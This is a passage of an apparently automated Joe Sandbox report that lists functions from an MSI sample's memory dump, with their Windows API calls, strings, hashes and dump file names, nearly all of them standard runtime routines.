Opcode Fuzzy Hash: 8a93d6f6ce7c47c42d159fd89570bd776e88f6203a99c68e177734dc8ab1a0ef
Instruction Fuzzy Hash: F6D25972E082688FDB65CF29CD407EAB7B5EB44304F2441EAD55DE7241EB74AE828F41

Function 00CEE5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00CEE8D1,00000002,00000000,?,?,?,00CEE8D1,?,00000000), ref: 00CEE64C
GetLocaleInfoW.KERNEL32(?,20001004,00CEE8D1,00000002,00000000,?,?,?,00CEE8D1,?,00000000), ref: 00CEE675
GetACP.KERNEL32(?,?,00CEE8D1,?,00000000), ref: 00CEE68A

Strings

OCP, xrefs: 00CEE607
ACP, xrefs: 00CEE5D1

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 45fc391ef6189e05adbc8004db3f9ee7b94acbbe63085de787b6af20b8c51015
Instruction ID: 4c687d65a23f514a13564151fcd91c4f9cffdc54b4fa43fa02b3acd0c0f77795
Opcode Fuzzy Hash: 45fc391ef6189e05adbc8004db3f9ee7b94acbbe63085de787b6af20b8c51015
Instruction Fuzzy Hash: F721A172700189A7DB348F57C901BAB73AAAB64BE4B568464F91ADB214E732DE40C350

Function 00CB9CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00CB9E60
LocalFree.KERNEL32(00000000), ref: 00CB9EB7
_swprintf.LIBCMT ref: 00CBA0A0
LocalFree.KERNEL32(00000000), ref: 00CBA0F7
_swprintf.LIBCMT ref: 00CBA183

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: _swprintf$FreeLocal
String ID:
API String ID: 2429749586-0
Opcode ID: c454f1431bbc8bfb94a30d842973ef90819b7ac2eefb59ad38ed30836fa03d01
Instruction ID: 1b716d647aff5a59f2690a79091dd1c9ce1c8e04f053f5a83ffcfff31479f52a
Opcode Fuzzy Hash: c454f1431bbc8bfb94a30d842973ef90819b7ac2eefb59ad38ed30836fa03d01
Instruction Fuzzy Hash: 48F19B71D10219ABDF18DFA9DC40BEEBBB9FF49310F144229FA11A7281D735A941CBA1

Function 00CEE788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00CEE894
IsValidCodePage.KERNEL32(00000000), ref: 00CEE8DD
IsValidLocale.KERNEL32(?,00000001), ref: 00CEE8EC
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CEE934
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CEE953

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: ecc1baf0700693114882220e4759da6cba609645ae6b2887c8d407a606fdf8e3
Instruction ID: d9bff4f688d55f9951285132862fcdc0b58d6af1dc3f928d5ac62d5505946aa7
Opcode Fuzzy Hash: ecc1baf0700693114882220e4759da6cba609645ae6b2887c8d407a606fdf8e3
Instruction Fuzzy Hash: AC519171A00359AFEB20DFAADC45BBE73B8FF48780F144069E924E7191E7709A04DB61

Function 00CE5D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00CE5DFA

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
Instruction ID: b3079be243bbe2d0b67e35639198ebc82c218bb91bb3d5264834ad8ae6bb3c88
Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
Instruction Fuzzy Hash: A6B19C72D006D59FDB15CF6AC881BFEBBA5EF59344F14816AE911AB341D238DE01CBA0

Function 00CEB02D Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00CEB0C8
FindNextFileW.KERNEL32(00000000,?), ref: 00CEB143
FindClose.KERNEL32(00000000), ref: 00CEB165
FindClose.KERNEL32(00000000), ref: 00CEB188

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 24b04528ab72fb9d02890b9b7e5d3fb82fc72938f9de248cb59d83c9ab11a733
Instruction ID: a69a4dc72fb5f2e96ed348dabb2b81f30cadb0cefd78f5e7ce078ecbfd5b6ae5
Opcode Fuzzy Hash: 24b04528ab72fb9d02890b9b7e5d3fb82fc72938f9de248cb59d83c9ab11a733
Instruction Fuzzy Hash: 8941D671900269AFDB20EFAACC99ABFB7B8EF85314F144195E419D3140EB309F80CB61

Function 00CD33A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CD33B4
IsDebuggerPresent.KERNEL32 ref: 00CD3480
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CD34A0
UnhandledExceptionFilter.KERNEL32(?), ref: 00CD34AA

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 8a6f23c02d5e50972b8eb97f85ba324c04f05543b826f61d1c4efeaf3d53547f
Instruction ID: 46fa8827902833cf0574371290179634fdc34be2dda4ab201034c4bbf7254c67
Opcode Fuzzy Hash: 8a6f23c02d5e50972b8eb97f85ba324c04f05543b826f61d1c4efeaf3d53547f
Instruction Fuzzy Hash: 98314A75D0521C9BDB10DFA0D989BCCBBB8AF08304F1041EAE60CAB250EB759B85DF45

Function 00CBD0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00CBC630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,665E9022,?,00CF3D30,000000FF), ref: 00CBC657
Part of subcall function 00CBC630: GetLastError.KERNEL32(?,00000000,00000000,665E9022,?,00CF3D30,000000FF), ref: 00CBC661

IsDebuggerPresent.KERNEL32(?,?,00D08AF0), ref: 00CBD0D8
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00D08AF0), ref: 00CBD0E7

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00CBD0E2

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: b0af9bda34a16092da2b008423de561ee69d9561cea39001241cdbddf32ad0aa
Instruction ID: c0ad3e525e9742b1d9efb80888d826855369d39dba9af117f859f7dbde315155
Opcode Fuzzy Hash: b0af9bda34a16092da2b008423de561ee69d9561cea39001241cdbddf32ad0aa
Instruction Fuzzy Hash: 75E092B06047418FD760AF28F5487977BE4AF10304F008A6CE45AC2340EBB5D489CBA3

Function 00CEE237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CEE28B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CEE2D5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CEE39B

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 0f56328b1b8bec30bd2024d87166d5ba937ff1787d0c857ec5ac61852802b39f
Instruction ID: 768629cdee1ba4f6d039d77a6c2b5ad933bc86764d458dd9781bee8707495bf3
Opcode Fuzzy Hash: 0f56328b1b8bec30bd2024d87166d5ba937ff1787d0c857ec5ac61852802b39f
Instruction Fuzzy Hash: 3961C1715002479FEB28DF66CC82BBA73A8FF08350F10417AE925C7295E738DA94DB50

Function 00CD6E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CD6F13
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CD6F1D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00CD6F2A

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb2037618105da4f7fb1b4599bbf0e89134fa3a2f1c0ef8076fe2c554ab142d8
Instruction ID: 0118e5530f8f45a88ef9cd65a8074d5e11255b1238a519047b74b0d8d4060b6a
Opcode Fuzzy Hash: eb2037618105da4f7fb1b4599bbf0e89134fa3a2f1c0ef8076fe2c554ab142d8
Instruction Fuzzy Hash: 4531A374901228ABCB21DF64D9897DDBBB8BF18310F5042EAE51CA7250EB70AF85DF45

Function 00CB45B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,00000000,665E9022,00000001,00000000,?,00000000,00CF4460,000000FF,?,00CB474D,00CB3778,?,00000000,00000000,?), ref: 00CB45DB
LockResource.KERNEL32(00000000,?,00000000,00CF4460,000000FF,?,00CB474D,00CB3778,?,00000000,00000000,?,?,?,?,00CB3778), ref: 00CB45E6
SizeofResource.KERNEL32(00000000,00000000,?,00000000,00CF4460,000000FF,?,00CB474D,00CB3778,?,00000000,00000000,?,?,?), ref: 00CB45F4

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: a3d8db4b0be02ed134ea94f7df73f8fbc3f44b6d809f9fc4861162a410cba13b
Instruction ID: ee20f00b404339697b526bbe4b47d6113695a80e7df7d5986165d6643e4334f6
Opcode Fuzzy Hash: a3d8db4b0be02ed134ea94f7df73f8fbc3f44b6d809f9fc4861162a410cba13b
Instruction Fuzzy Hash: 0E11A332A086549BC7398F59DC44BBBB7BCEB85715F00062AFD2AD3240EB359D00C690

Function 00CDE270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
Instruction ID: c5c12caefe9dc288c2c3ac6cc067daa2e456ddf0ee2e95fdcda42333d20d4a54
Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
Instruction Fuzzy Hash: 04F14171E002199FDF14DFA9D9806ADB7B1FF88314F15826EE925AB391D730AE01CB90

Function 00CE7B1F Relevance: 1.9, APIs: 1, Instructions: 410timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CE7F64,00000000,00000000,00000000), ref: 00CE7E23

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: f82e7a838fd8a97573a65ac3e97e5c5ee31ee5d329326be296343231fa4155cf
Instruction ID: 6b82f2d3bb4fb6e2b90a4045acc5d54f94a5aeb1c7a212b574c86473ed5fbd0a
Opcode Fuzzy Hash: f82e7a838fd8a97573a65ac3e97e5c5ee31ee5d329326be296343231fa4155cf
Instruction Fuzzy Hash: 98D14772D04255ABDB24BBA6DC02ABEB7B9EF04710F204656FA14EB291E7309F41D790

Function 00CE84BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CE84B8,?,?,00000008,?,?,00CF14E4,00000000), ref: 00CE86EA

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 295d75b22761f0a5c5a490c28f6088becf8068c294a2a05c4adc06d575ee3786
Instruction ID: 3f65ca148bc1fcbd1d068783fa8eeba80e2bc7e40c2b688a808d49b15fb1dbee
Opcode Fuzzy Hash: 295d75b22761f0a5c5a490c28f6088becf8068c294a2a05c4adc06d575ee3786
Instruction Fuzzy Hash: D9B14A32210648CFD715CF29C48AB657BA0FF45364F258658F8AECF2A1CB35EA95CB40

Function 00CD35A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CD35BF

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 3b4c7eba135bcc3c225c1e0991d28fa515da2de8e3bbe29a37a4993dda532057
Instruction ID: adbccbdf3fedf447a3c11bb9d1941d54adb183b3d4d016808a71bc89b89e6d46
Opcode Fuzzy Hash: 3b4c7eba135bcc3c225c1e0991d28fa515da2de8e3bbe29a37a4993dda532057
Instruction Fuzzy Hash: 2F5189B1A11705CBEB25CF99E8857AABBF0FB08344F24816BD519EB350D3749A00CFA1

Function 00CDA587 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00CDA715

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ebb3cbcfabd6a506fde91db2df849f4eff62bf5dc4774c8feb60728ce4648b9d
Instruction ID: fb526ec7b3223a6c773c5f32fc4acc090ba13cd57f497605f1e0c60ae134bc25
Opcode Fuzzy Hash: ebb3cbcfabd6a506fde91db2df849f4eff62bf5dc4774c8feb60728ce4648b9d
Instruction Fuzzy Hash: DDC1AF70900A46CFCB28CF29C49467EBBB1BF45310F28461BEA6697391D731EE46DB52

Function 00CEE48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CEE4DE

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 11f7469eb82a02df99d4d43b9e73b9f808176f30d7c2c08c9029977dfc0ab93f
Instruction ID: bee57320e1c79d03a09031d926d1597bd8a32fa0c6b9fb08b723ac89465553e9
Opcode Fuzzy Hash: 11f7469eb82a02df99d4d43b9e73b9f808176f30d7c2c08c9029977dfc0ab93f
Instruction Fuzzy Hash: C121C232615286ABDB28AF66DC41ABA73ACEF04358F14417AF916C6241FB34EE04E750

Function 00CEE111 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872

EnumSystemLocalesW.KERNEL32(00CEE237,00000001,00000000,?,-00000050,?,00CEE868,00000000,?,?,?,00000055,?), ref: 00CEE183

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 133672f265895bed8e443d80b0f3d83738cf1fd8df6467082b4d40e2b0f1e8ee
Instruction ID: 7a4292c87bf5baf760826f6e2dcaeda9b06ee8ebe48428566414815e558bc2e9
Opcode Fuzzy Hash: 133672f265895bed8e443d80b0f3d83738cf1fd8df6467082b4d40e2b0f1e8ee
Instruction Fuzzy Hash: 7311293B2007019FDB189F3AC8916BEB791FF84758B19442CE55647A40E3717942CB40

Function 00CEE6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CEE453,00000000,00000000,?), ref: 00CEE6E5

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 779e0999363ad2b0a2373b39db5d43680947eb43a3526c8050af86083d901edf
Instruction ID: 85171c0e8453ba5a04230253f53db42c35d5614db6dc6f25a14d39a4af61cb75
Opcode Fuzzy Hash: 779e0999363ad2b0a2373b39db5d43680947eb43a3526c8050af86083d901edf
Instruction Fuzzy Hash: 22F0CD36600252BBDB285B66CC05BBE7758EB447D4F154424ED16A3180EE74FE41C690

Function 00CEE1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872

EnumSystemLocalesW.KERNEL32(00CEE48A,00000001,?,?,-00000050,?,00CEE82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00CEE1F6

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
